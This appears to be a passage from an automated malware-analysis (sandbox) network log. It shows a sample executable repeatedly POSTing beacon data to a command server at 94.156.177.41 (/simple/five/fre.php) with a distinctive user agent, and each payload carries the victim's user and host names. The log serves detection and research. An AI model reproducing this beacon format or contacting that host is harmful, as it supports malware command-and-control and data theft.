                            Jan 11, 2025 07:46:07.967211008 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:07 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            111192.168.2.55009294.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:08.133380890 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:08.138322115 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:08.856152058 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:08 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            112192.168.2.55009394.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:09.026247025 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:09.033339024 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:09.755974054 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:09 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            113192.168.2.55009494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:09.905754089 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:09.910608053 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:10.621844053 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:10 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            114192.168.2.55009594.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:10.792256117 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:10.798043966 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:11.520802021 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:11 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            115192.168.2.55009694.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:11.685985088 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:11.690984964 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:12.414182901 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:12 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            116192.168.2.55009794.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:12.558747053 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:12.563647032 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:13.286118984 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:13 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            117192.168.2.55009894.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:13.432965040 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:13.437851906 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:14.163225889 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:14 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            118192.168.2.55009994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:14.305083990 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:14.311717033 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:15.039928913 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:14 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            119192.168.2.55010094.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:15.191468000 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:15.196450949 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:15.899775028 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:15 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            120192.168.2.55010194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:16.062007904 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:16.066977024 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:16.788527966 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:16 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            121192.168.2.55010294.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:16.941674948 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:16.947180033 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:17.639245987 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:17 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            122192.168.2.55010394.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:17.791002989 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:17.795814037 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:18.635993958 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:18 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            123192.168.2.55010494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:18.791034937 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:18.795869112 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:19.502355099 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:19 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            124192.168.2.55010594.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:19.672302961 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:19.678030014 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:20.387223005 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:20 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            125192.168.2.55010694.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:20.540424109 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:20.545406103 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:21.299537897 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:21 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            126192.168.2.55010794.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:21.445941925 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:21.450793982 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:22.344794035 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:22 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            127192.168.2.55010894.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:22.493406057 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:22.498284101 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:23.228400946 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:23 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            128192.168.2.55010994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:23.366950035 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:23.372577906 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:24.078866959 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:23 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            129192.168.2.55011094.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:24.215676069 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:24.220617056 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:24.943252087 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:24 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            130192.168.2.55011194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:25.090544939 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:25.095419884 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:25.811788082 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:25 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            131192.168.2.55011294.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:25.953727007 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:25.958652973 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
